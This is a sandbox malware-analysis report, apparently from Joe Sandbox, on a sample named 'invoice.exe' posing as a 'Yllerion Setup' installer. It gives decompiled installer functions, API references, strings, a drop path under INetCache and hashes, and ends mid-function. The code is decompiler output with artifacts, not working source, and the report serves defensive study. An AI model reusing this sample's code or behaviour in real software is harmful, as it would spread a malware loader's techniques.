Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Diskofils\Justiciaryship
API String ID: 123533781-1385751471
Opcode ID: 3ab9ca111cfd16ea316d8908730db186f13cf70328ad1dfde5033f2efd3f2ba1
Instruction ID: 70e90dd273e36d6cf470b0c6c9ff695bb876e65ea6d8ae05c01ad1deac9bcbee
Opcode Fuzzy Hash: 3ab9ca111cfd16ea316d8908730db186f13cf70328ad1dfde5033f2efd3f2ba1
Instruction Fuzzy Hash: D9512775A00208BFCF10DFE4C988A9DBBB5EF48318F2045AAF915EB2D1DA799941CF14

Uniqueness

Uniqueness Score: -1.00%

Function 00406268 Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406268(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x42c0c0); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x42c0c0;
			}

0x00406273
0x0040627c
0x00000000
0x00406289
0x0040627f
0x00000000

APIs

FindFirstFileA.KERNELBASE(76793410,0042C0C0,0042BC78,00405A2E,0042BC78,0042BC78,00000000,0042BC78,0042BC78,76793410,?,C:\Users\user\AppData\Local\Temp\,0040574D,?,76793410,C:\Users\user\AppData\Local\Temp\), ref: 00406273
FindClose.KERNEL32(00000000), ref: 0040627F

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: f33084ac43254253387421f94672507a8f359bb84d60abe7f61aad8f4daa312f
Instruction ID: e0279db6a2f9a876ecb4b02bc738002a428a13ad585e0dc9357aaf1afb57e826
Opcode Fuzzy Hash: f33084ac43254253387421f94672507a8f359bb84d60abe7f61aad8f4daa312f
Instruction Fuzzy Hash: 9DD012365060209FC25027786D0C85B7A589F053317118B7FF8AAF21E0C7348CA386DC

Uniqueness

Uniqueness Score: -1.00%

Function 00403B52 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00403B52(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t68;
				struct HWND__* _t74;
				signed int _t87;
				struct HWND__* _t92;
				signed int _t100;
				int _t104;
				signed int _t116;
				signed int _t117;
				int _t118;
				signed int _t123;
				struct HWND__* _t126;
				struct HWND__* _t127;
				int _t128;
				long _t131;
				int _t133;
				int _t134;
				void* _t135;
				void* _t143;

				_t116 = _a8;
				if(_t116 == 0x110 || _t116 == 0x408) {
					_t35 = _a12;
					_t126 = _a4;
					__eflags = _t116 - 0x110;
					 *0x42a858 = _t35;
					if(_t116 == 0x110) {
						 *0x42f408 = _t126;
						 *0x42a86c = GetDlgItem(_t126, "true");
						_t92 = GetDlgItem(_t126, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x429838 = _t92;
						E00404026(_t126);
						SetClassLongA(_t126, 0xfffffff2,  *0x42ebe8);
						 *0x42ebcc = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42a858 = 1;
					}
					_t123 =  *0x40a1dc; // 0x0
					_t134 = 0;
					_t131 = (_t123 << 6) +  *0x42f440;
					__eflags = _t123;
					if(_t123 < 0) {
						L34:
						E00404072(0x40b);
						while(1) {
							_t37 =  *0x42a858;
							 *0x40a1dc =  *0x40a1dc + _t37;
							_t131 = _t131 + (_t37 << 6);
							_t39 =  *0x40a1dc; // 0x0
							__eflags = _t39 -  *0x42f444;
							if(_t39 ==  *0x42f444) {
								E0040140B("true");
							}
							__eflags =  *0x42ebcc - _t134; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x40a1dc -  *0x42f444; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t131 + 0x14);
							E00405F87(_t117, _t126, _t131, 0x437800,  *((intOrPtr*)(_t131 + 0x24)));
							_push( *((intOrPtr*)(_t131 + 0x20)));
							_push(0xfffffc19);
							E00404026(_t126);
							_push( *((intOrPtr*)(_t131 + 0x1c)));
							_push(0xfffffc1b);
							E00404026(_t126);
							_push( *((intOrPtr*)(_t131 + 0x28)));
							_push(0xfffffc1a);
							E00404026(_t126);
							_t49 = GetDlgItem(_t126, 3);
							__eflags =  *0x42f4ac - _t134;
							_v32 = _t49;
							if( *0x42f4ac != _t134) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t49, _t117 & 0x00000008); // executed
							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100); // executed
							E00404048(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x429838, _t118);
							__eflags = _t118 - _t134;
							if(_t118 == _t134) {
								_push("true");
							} else {
								_push(_t134);
							}
							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, "true");
							__eflags =  *0x42f4ac - _t134;
							if( *0x42f4ac == _t134) {
								_push( *0x42a86c);
							} else {
								SendMessageA(_t126, 0x401, 2, _t134);
								_push( *0x429838);
							}
							E0040405B();
							E00405F65(0x42a870, E00403B33());
							E00405F87(0x42a870, _t126, _t131,  &(0x42a870[lstrlenA(0x42a870)]),  *((intOrPtr*)(_t131 + 0x18)));
							SetWindowTextA(_t126, 0x42a870); // executed
							_push(_t134);
							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)));
							__eflags = _t68;
							if(_t68 != 0) {
								continue;
							} else {
								__eflags =  *_t131 - _t134;
								if( *_t131 == _t134) {
									continue;
								}
								__eflags =  *(_t131 + 4) - 5;
								if( *(_t131 + 4) != 5) {
									DestroyWindow( *0x42ebd8); // executed
									 *0x42a048 = _t131;
									__eflags =  *_t131 - _t134;
									if( *_t131 <= _t134) {
										goto L58;
									}
									_t74 = CreateDialogParamA( *0x42f400,  *_t131 +  *0x42ebe0 & 0x0000ffff, _t126,  *( *(_t131 + 4) * 4 + "oA@"), _t131); // executed
									__eflags = _t74 - _t134;
									 *0x42ebd8 = _t74;
									if(_t74 == _t134) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t131 + 0x2c)));
									_push(6);
									E00404026(_t74);
									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
									ScreenToClient(_t126, _t135 + 0x10);
									SetWindowPos( *0x42ebd8, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
									_push(_t134);
									E00401389( *((intOrPtr*)(_t131 + 0xc)));
									__eflags =  *0x42ebcc - _t134; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x42ebd8, 8); // executed
									E00404072(0x405);
									goto L58;
								}
								__eflags =  *0x42f4ac - _t134;
								if( *0x42f4ac != _t134) {
									goto L61;
								}
								__eflags =  *0x42f4a0 - _t134;
								if( *0x42f4a0 != _t134) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x42ebd8);
						 *0x42f408 = _t134;
						EndDialog(_t126,  *0x429c40);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t131 - _t134;
							if( *_t131 == _t134) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
						__eflags = _t87;
						if(_t87 == 0) {
							goto L33;
						}
						SendMessageA( *0x42ebd8, 0x40f, 0, "true");
						__eflags =  *0x42ebcc - _t134; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t126 = _a4;
					_t134 = 0;
					if(_t116 == 0x47) {
						SetWindowPos( *0x42a850, _t126, 0, 0, 0, 0, 0x13);
					}
					if(_t116 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x42a850,  ~(_a12 - 1) & _t116);
					}
					if(_t116 != 0x40d) {
						__eflags = _t116 - 0x11;
						if(_t116 != 0x11) {
							__eflags = _t116 - 0x111;
							if(_t116 != 0x111) {
								L26:
								return E0040408D(_t116, _a12, _a16);
							}
							_t133 = _a12 & 0x0000ffff;
							_t127 = GetDlgItem(_t126, _t133);
							__eflags = _t127 - _t134;
							if(_t127 == _t134) {
								L13:
								__eflags = _t133 - 1;
								if(_t133 != 1) {
									__eflags = _t133 - 3;
									if(_t133 != 3) {
										_t128 = 2;
										__eflags = _t133 - _t128;
										if(_t133 != _t128) {
											L25:
											SendMessageA( *0x42ebd8, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42f4ac - _t134;
										if( *0x42f4ac == _t134) {
											_t100 = E0040140B(3);
											__eflags = _t100;
											if(_t100 != 0) {
												goto L26;
											}
											 *0x429c40 = 1;
											L21:
											_push(0x78);
											L22:
											E00403FFF();
											goto L26;
										}
										E0040140B(_t128);
										 *0x429c40 = _t128;
										goto L21;
									}
									__eflags =  *0x40a1dc - _t134; // 0x0
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t133);
								goto L22;
							}
							SendMessageA(_t127, 0xf3, _t134, _t134);
							_t104 = IsWindowEnabled(_t127);
							__eflags = _t104;
							if(_t104 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t126, _t134, _t134);
						return 1;
					} else {
						DestroyWindow( *0x42ebd8);
						 *0x42ebd8 = _a12;
						L58:
						if( *0x42b870 == _t134) {
							_t143 =  *0x42ebd8 - _t134; // 0x103bc
							if(_t143 != 0) {
								ShowWindow(_t126, 0xa); // executed
								 *0x42b870 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}

0x00403b5b
0x00403b64
0x00403ca5
0x00403ca9
0x00403cad
0x00403caf
0x00403cb4
0x00403cbf
0x00403cca
0x00403ccf
0x00403cd1
0x00403cd3
0x00403cd6
0x00403cdb
0x00403ce9
0x00403cf6
0x00403cfd
0x00403cfd
0x00403cfe
0x00403cfe
0x00403d03
0x00403d09
0x00403d10
0x00403d16
0x00403d18
0x00403d58
0x00403d5d
0x00403d62
0x00403d62
0x00403d67
0x00403d70
0x00403d72
0x00403d77
0x00403d7d
0x00403d81
0x00403d81
0x00403d86
0x00403d8c
0x00000000
0x00000000
0x00403d97
0x00403d9d
0x00000000
0x00000000
0x00403da6
0x00403dae
0x00403db3
0x00403db6
0x00403dbc
0x00403dc1
0x00403dc4
0x00403dca
0x00403dcf
0x00403dd2
0x00403dd8
0x00403de0
0x00403de6
0x00403dec
0x00403df0
0x00403df7
0x00403df7
0x00403df7
0x00403e01
0x00403e13
0x00403e1f
0x00403e24
0x00403e2e
0x00403e34
0x00403e36
0x00403e3b
0x00403e38
0x00403e38
0x00403e38
0x00403e4b
0x00403e63
0x00403e65
0x00403e6b
0x00403e80
0x00403e6d
0x00403e76
0x00403e78
0x00403e78
0x00403e86
0x00403e97
0x00403ea8
0x00403eaf
0x00403eb5
0x00403eb9
0x00403ebe
0x00403ec0
0x00000000
0x00403ec6
0x00403ec6
0x00403ec8
0x00000000
0x00000000
0x00403ece
0x00403ed2
0x00403ef7
0x00403efd
0x00403f03
0x00403f05
0x00000000
0x00000000
0x00403f2b
0x00403f31
0x00403f33
0x00403f38
0x00000000
0x00000000
0x00403f3e
0x00403f41
0x00403f44
0x00403f5b
0x00403f67
0x00403f80
0x00403f86
0x00403f8a
0x00403f8f
0x00403f95
0x00000000
0x00000000
0x00403f9f
0x00403faa
0x00000000
0x00403faa
0x00403ed4
0x00403eda
0x00000000
0x00000000
0x00403ee0
0x00403ee6
0x00000000
0x00000000
0x00000000
0x00403eec
0x00403ec0
0x00403fb7
0x00403fc3
0x00403fca
0x00000000
0x00403d1a
0x00403d1a
0x00403d1d
0x00403d50
0x00403d50
0x00403d52
0x00000000
0x00000000
0x00000000
0x00403d52
0x00403d1f
0x00403d23
0x00403d28
0x00403d2a
0x00000000
0x00000000
0x00403d3a
0x00403d42
0x00000000
0x00403d48
0x00403b76
0x00403b76
0x00403b7a
0x00403b7f
0x00403b8e
0x00403b8e
0x00403b97
0x00403ba0
0x00403bab
0x00403bab
0x00403bb7
0x00403bd3
0x00403bd6
0x00403be9
0x00403bef
0x00403c92
0x00000000
0x00403c9b
0x00403bf5
0x00403c02
0x00403c04
0x00403c06
0x00403c25
0x00403c25
0x00403c28
0x00403c2d
0x00403c30
0x00403c40
0x00403c41
0x00403c43
0x00403c79
0x00403c8c
0x00000000
0x00403c8c
0x00403c45
0x00403c4b
0x00403c64
0x00403c69
0x00403c6b
0x00000000
0x00000000
0x00403c6d
0x00403c59
0x00403c59
0x00403c5b
0x00403c5b
0x00000000
0x00403c5b
0x00403c4e
0x00403c53
0x00000000
0x00403c53
0x00403c32
0x00403c38
0x00000000
0x00000000
0x00403c3a
0x00000000
0x00403c3a
0x00403c2a
0x00000000
0x00403c2a
0x00403c10
0x00403c17
0x00403c1d
0x00403c1f
0x00000000
0x00000000
0x00000000
0x00403c1f
0x00403bdb
0x00000000
0x00403bb9
0x00403bbf
0x00403bc9
0x00403fd0
0x00403fd6
0x00403fd8
0x00403fde
0x00403fe3
0x00403fe9
0x00403fe9
0x00403fde
0x00403ff3
0x00000000
0x00403ff3
0x00403bb7

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B8E
ShowWindow.USER32(?), ref: 00403BAB
DestroyWindow.USER32 ref: 00403BBF
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BDB
GetDlgItem.USER32(?,?), ref: 00403BFC
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C10
IsWindowEnabled.USER32(00000000), ref: 00403C17
GetDlgItem.USER32(?,?), ref: 00403CC5
GetDlgItem.USER32(?,00000002), ref: 00403CCF
SetClassLongA.USER32(?,000000F2,?), ref: 00403CE9
SendMessageA.USER32(0000040F,00000000,?,?), ref: 00403D3A
GetDlgItem.USER32(?,00000003), ref: 00403DE0
ShowWindow.USER32(00000000,?), ref: 00403E01
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403E13
EnableWindow.USER32(?,?), ref: 00403E2E
GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403E44
EnableMenuItem.USER32(00000000), ref: 00403E4B
SendMessageA.USER32(?,000000F4,00000000,?), ref: 00403E63
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E76
lstrlenA.KERNEL32(Yllerion Setup: Installing,?,Yllerion Setup: Installing,00000000), ref: 00403EA0
SetWindowTextA.USER32(?,Yllerion Setup: Installing), ref: 00403EAF
ShowWindow.USER32(?,0000000A), ref: 00403FE3

Strings

Yllerion Setup: Installing, xrefs: 00403E90, 00403E96, 00403E9F, 00403EAD

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: Yllerion Setup: Installing
API String ID: 3282139019-2322757991
Opcode ID: a610b2fa877343fbf3bdc554c55ad236ee119dc4ae72ad2b999ac5e47659cd96
Instruction ID: 825bbfaa6b66e15a56cde4951677423d70b10f791e0768be12abaf391e468a8e
Opcode Fuzzy Hash: a610b2fa877343fbf3bdc554c55ad236ee119dc4ae72ad2b999ac5e47659cd96
Instruction Fuzzy Hash: 80C19F71604205AFDB206F22EE45E2B3EBCFB4570AF40053EFA42B11E1CB7999429B1D

Uniqueness

Uniqueness Score: -1.00%

Function 004037B5 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E004037B5(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				void* _t25;
				void* _t27;
				int _t28;
				void* _t31;
				int _t34;
				int _t35;
				intOrPtr _t36;
				int _t39;
				char _t57;
				CHAR* _t59;
				signed char _t63;
				CHAR* _t74;
				intOrPtr _t76;
				CHAR* _t81;

				_t76 =  *0x42f414;
				_t17 = E004062FD(2);
				_t84 = _t17;
				if(_t17 == 0) {
					_t74 = 0x42a870;
					"1033" = 0x30;
					 *0x436001 = 0x78;
					 *0x436002 = 0;
					E00405E4C(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a870, 0);
					__eflags =  *0x42a870; // 0x59
					if(__eflags == 0) {
						E00405E4C(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040835A, 0x42a870, 0);
					}
					lstrcatA("1033", _t74);
				} else {
					E00405EC3("1033",  *_t17() & 0x0000ffff);
				}
				E00403A7A(_t71, _t84);
				_t80 = "C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\predepository";
				 *0x42f4a0 =  *0x42f41c & 0x00000020;
				 *0x42f4bc = 0x10000;
				if(E004059EB(_t84, "C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\predepository") != 0) {
					L16:
					if(E004059EB(_t92, _t80) == 0) {
						E00405F87(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118))); // executed
					}
					_t25 = LoadImageA( *0x42f400, 0x67, "true", 0, 0, 0x8040); // executed
					 *0x42ebe8 = _t25;
					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t27 = E00403A7A(_t71, __eflags);
							__eflags =  *0x42f4c0;
							if( *0x42f4c0 != 0) {
								_t28 = E0040515E(_t27, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									E0040140B("true");
									goto L33;
								}
								__eflags =  *0x42ebcc; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42a850, 5); // executed
							_t34 = E0040628F("RichEd20"); // executed
							__eflags = _t34;
							if(_t34 == 0) {
								E0040628F("RichEd32");
							}
							_t81 = "RichEdit20A";
							_t35 = GetClassInfoA(0, _t81, 0x42eba0);
							__eflags = _t35;
							if(_t35 == 0) {
								GetClassInfoA(0, "RichEdit", 0x42eba0);
								 *0x42ebc4 = _t81;
								RegisterClassA(0x42eba0);
							}
							_t36 =  *0x42ebe0; // 0x0
							_t39 = DialogBoxParamA( *0x42f400, _t36 + 0x00000069 & 0x0000ffff, 0, E00403B52, 0); // executed
							E00403705(E0040140B(5), "true");
							return _t39;
						}
						L22:
						_t31 = 2;
						return _t31;
					} else {
						_t71 =  *0x42f400;
						 *0x42eba4 = E00401000;
						 *0x42ebb0 =  *0x42f400;
						 *0x42ebb4 = _t25;
						 *0x42ebc4 = 0x40a1f4;
						if(RegisterClassA(0x42eba0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoA(0x30, 0,  &_v16, 0);
						 *0x42a850 = CreateWindowExA(0x80, 0x40a1f4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42f400, 0);
						goto L21;
					}
				} else {
					_t71 =  *(_t76 + 0x48);
					_t86 = _t71;
					if(_t71 == 0) {
						goto L16;
					}
					_t74 = 0x42e3a0;
					E00405E4C(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x42f458, 0x42e3a0, 0);
					_t57 =  *0x42e3a0; // 0x43
					if(_t57 == 0) {
						goto L16;
					}
					if(_t57 == 0x22) {
						_t74 = 0x42e3a1;
						 *((char*)(E00405928(0x42e3a1, 0x22))) = 0;
					}
					_t59 = lstrlenA(_t74) + _t74 - 4;
					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
						L15:
						E00405F65(_t80, E004058FD(_t74));
						goto L16;
					} else {
						_t63 = GetFileAttributesA(_t74);
						if(_t63 == 0xffffffff) {
							L14:
							E00405944(_t74);
							goto L15;
						}
						_t92 = _t63 & 0x00000010;
						if((_t63 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x004037bb
0x004037c4
0x004037cb
0x004037cd
0x004037e1
0x004037f3
0x004037fa
0x00403801
0x00403807
0x0040380c
0x00403812
0x00403825
0x00403825
0x00403830
0x004037cf
0x004037da
0x004037da
0x00403835
0x0040383f
0x00403848
0x0040384d
0x0040385e
0x004038e5
0x004038ed
0x004038f6
0x004038f6
0x0040390c
0x00403912
0x00403920
0x004039a1
0x004039a9
0x004039b3
0x004039b8
0x004039be
0x00403a48
0x00403a4d
0x00403a4f
0x00403a6b
0x00000000
0x00403a6b
0x00403a51
0x00403a57
0x00403a5f
0x00403a5f
0x00000000
0x00403a57
0x004039cc
0x004039d7
0x004039dc
0x004039de
0x004039e5
0x004039e5
0x004039f0
0x004039f8
0x004039fa
0x004039fc
0x00403a05
0x00403a08
0x00403a0e
0x00403a0e
0x00403a14
0x00403a2d
0x00403a3e
0x00000000
0x00403a43
0x004039ab
0x004039ad
0x00000000
0x00403922
0x00403922
0x0040392e
0x00403938
0x0040393e
0x00403943
0x00403952
0x00403a70
0x00403a70
0x00000000
0x00403a70
0x00403961
0x0040399c
0x00000000
0x0040399c
0x00403864
0x00403864
0x00403867
0x00403869
0x00000000
0x00000000
0x00403873
0x00403883
0x00403888
0x0040388f
0x00000000
0x00000000
0x00403893
0x00403895
0x004038a2
0x004038a2
0x004038aa
0x004038b0
0x004038d8
0x004038e0
0x00000000
0x004038c2
0x004038c3
0x004038cc
0x004038d2
0x004038d3
0x00000000
0x004038d3
0x004038ce
0x004038d0
0x00000000
0x00000000
0x00000000
0x004038d0
0x004038b0

APIs

Part of subcall function 004062FD: GetModuleHandleA.KERNEL32(?,?,?,00403264,0000000A), ref: 0040630F
Part of subcall function 004062FD: GetProcAddress.KERNEL32(00000000,?), ref: 0040632A

lstrcatA.KERNEL32(1033,Yllerion Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Yllerion Setup: Installing,00000000,00000002,76793410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\invoice.exe",00000000), ref: 00403830
lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository,1033,Yllerion Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Yllerion Setup: Installing,00000000,00000002,76793410), ref: 004038A5
lstrcmpiA.KERNEL32(?,.exe), ref: 004038B8
GetFileAttributesA.KERNEL32(Call), ref: 004038C3
LoadImageA.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository), ref: 0040390C

Part of subcall function 00405EC3: wsprintfA.USER32 ref: 00405ED0

RegisterClassA.USER32(0042EBA0), ref: 00403949
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403961
CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403996
ShowWindow.USER32(00000005,00000000), ref: 004039CC
GetClassInfoA.USER32(00000000,RichEdit20A,0042EBA0), ref: 004039F8
GetClassInfoA.USER32(00000000,RichEdit,0042EBA0), ref: 00403A05
RegisterClassA.USER32(0042EBA0), ref: 00403A0E
DialogBoxParamA.USER32(?,00000000,00403B52,00000000), ref: 00403A2D

Strings

.DEFAULT\Control Panel\International, xrefs: 0040381B
Yllerion Setup: Installing, xrefs: 004037E1, 004037E7, 0040380C, 00403815, 0040382A
Control Panel\Desktop\ResourceLocale, xrefs: 004037E9
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository, xrefs: 0040383F, 00403847, 004038DF, 004038E5, 004038F5
"C:\Users\user\Desktop\invoice.exe", xrefs: 004037B9
RichEdit20A, xrefs: 004039F0, 004039F6
Call, xrefs: 00403873, 0040387B, 00403888, 004038D2, 004038D8
C:\Users\user\AppData\Local\Temp\, xrefs: 004037BA
RichEdit, xrefs: 004039FF
_Nb, xrefs: 00403928, 00403990
RichEd32, xrefs: 004039E0
1033, xrefs: 004037D5, 0040382B
RichEd20, xrefs: 004039D2
.exe, xrefs: 004038B2

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\invoice.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$Yllerion Setup: Installing$_Nb
API String ID: 1975747703-2461847341
Opcode ID: 0f9bd367d977802c11df8505ea4cdc09ad3fea20ebf391e442548ca576291c4a
Instruction ID: cf57693f3f88dc886a5042f17341946b18930627488d4c28d640959b633c26bb
Opcode Fuzzy Hash: 0f9bd367d977802c11df8505ea4cdc09ad3fea20ebf391e442548ca576291c4a
Instruction Fuzzy Hash: 3E61D770240600AED620BB669D45F373EACEB44749F40447EF985B22E2DB7C9D029A2D

Uniqueness

Uniqueness Score: -1.00%

Function 00405F87 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 199
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E00405F87(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t38;
				CHAR* _t39;
				signed int _t41;
				char _t52;
				char _t53;
				char _t55;
				char _t57;
				void* _t65;
				char* _t66;
				signed int _t80;
				intOrPtr _t86;
				char _t88;
				void* _t89;
				CHAR* _t90;
				void* _t92;
				signed int _t97;
				signed int _t99;
				void* _t100;

				_t92 = __esi;
				_t89 = __edi;
				_t65 = __ebx;
				_t38 = _a8;
				if(_t38 < 0) {
					_t86 =  *0x42ebdc; // 0x67efe9
					_t38 =  *(_t86 - 4 + _t38 * 4);
				}
